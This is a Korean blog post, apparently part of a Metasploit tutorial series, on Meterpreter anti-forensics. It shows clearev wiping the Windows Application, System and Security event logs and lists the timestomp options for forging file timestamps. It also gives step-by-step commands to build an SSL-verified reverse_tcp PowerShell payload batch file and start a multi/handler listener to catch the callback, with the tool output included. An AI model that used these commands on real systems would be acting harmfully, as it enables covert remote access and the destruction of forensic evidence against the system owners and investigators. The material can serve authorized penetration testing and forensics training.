[MAD-METASPLOIT] 0x40 - Anti Forensic
Remove event log meterpreter > clearev [] Wiping 766 records from Application… [] Wiping 1375 records from System… [*] Wiping 346 records from Security…
Timestomp
meterpreter > timestomp
Usage: timestomp OPTIONS file_path
OPTIONS:
-a <opt> Set the "last accessed" time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the "creation" time of the file
-e <opt> Set the "mft entry modified" time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file
meterpreter > ls Listing: C:\Users\Public ========================
Mode Size Type Last modified Name —- —- —- ————- —- 40555/r-xr-xr-x 4096 dir 2017-08-07 14:20:54 +0900 Desktop 40555/r-xr-xr-x 4096 dir 2015-09-17 14:10:20 +0900 Documents 40555/r-xr-xr-x 0 dir 2009-07-14 13:41:57 +0900 Downloads 40555/r-xr-xr-x 0 dir 2009-07-14 11:04:25 +0900 Favorites 40777/rwxrwxrwx 0 dir 2015-11-23 19:00:27 +0900 Juniper Networks 40555/r-xr-xr-x 4096 dir 2015-09-17 12:14:24 +0900 Libraries 40555/r-xr-xr-x 0 dir 2009-07-14 13:41:57 +0900 Music 40555/r-xr-xr-x 0 dir 2009-07-14 13:41:57 +0900 Pictures 40555/r-xr-xr-x 0 dir 2011-04-13 06:00:52 +0900 Recorded TV 40555/r-xr-xr-x 0 dir 2009-07-14 13:41:57 +0900 Videos 100666/rw-rw-rw- 174 fil 2009-07-14 13:41:57 +0900 desktop.ini
meterpreter > timestomp desktop.ini -v Modified : 2009-07-14 13:41:57 +0900 Accessed : 2009-07-14 13:41:57 +0900 Created : 2009-07-14 13:41:57 +0900 Entry Modified: 2015-09-17 12:14:23 +0900
Paranoid Meterpreter
#> openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj “/C=US/ST=Texas/L=Austin/O=Development/CN=test” -keyout test.key -out #> cat test.key test.crt > test.pem
#> hvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.8 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./test.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat
No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Saved as: launch-paranoid.bat
우와 같이 명령을 주면 -o 으로 지정해준 .bat 파일이 떨어집니다. (windows target 기준) #> ll 합계 24 drwxr-xr-x 2 hahwul hahwul 4096 7월 12 22:12 . drwxr-xr-x 60 hahwul hahwul 4096 7월 12 22:12 .. -rw-r–r– 1 root root 6255 7월 12 22:12 launch-paranoid.bat -rw-r–r– 1 root root 5228 7월 12 22:06 test.pem
cat 으로 생성된 bat 파일을 보면 powsershell을 이용해서 암호화된 payload를 실행하는 것을 알 수 있습니다.
hahwul auxiliary(test) #> use exploit/multi/handler hahwul exploit(handler) #> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp hahwul exploit(handler) #> set LHOST 192.168.0.8 LHOST => 192.168.0.8 hahwul exploit(handler) #> set LPORT 443 LPORT => 443 hahwul exploit(handler) #> set HandlerSSLCert ./test.pem HandlerSSLCert => ./test.pem hahwul exploit(handler) #> set IgnoreUnknownPayloads true IgnoreUnknownPayloads => true hahwul exploit(handler) #> set StagerVerifySSLCert true; StagerVerifySSLCert => true;
hahwul exploit(handler) #> run -j [] Exploit running as background job. [] Started reverse TCP handler on 192.168.0.8:443
자세한 내용은 아래 링크 참고 http://www.hahwul.com/2016/07/metasploit-meterpreter-paranoid-mode.html
Reference
http://www.hahwul.com/2016/07/metasploit-meterpreter-paranoid-mode.html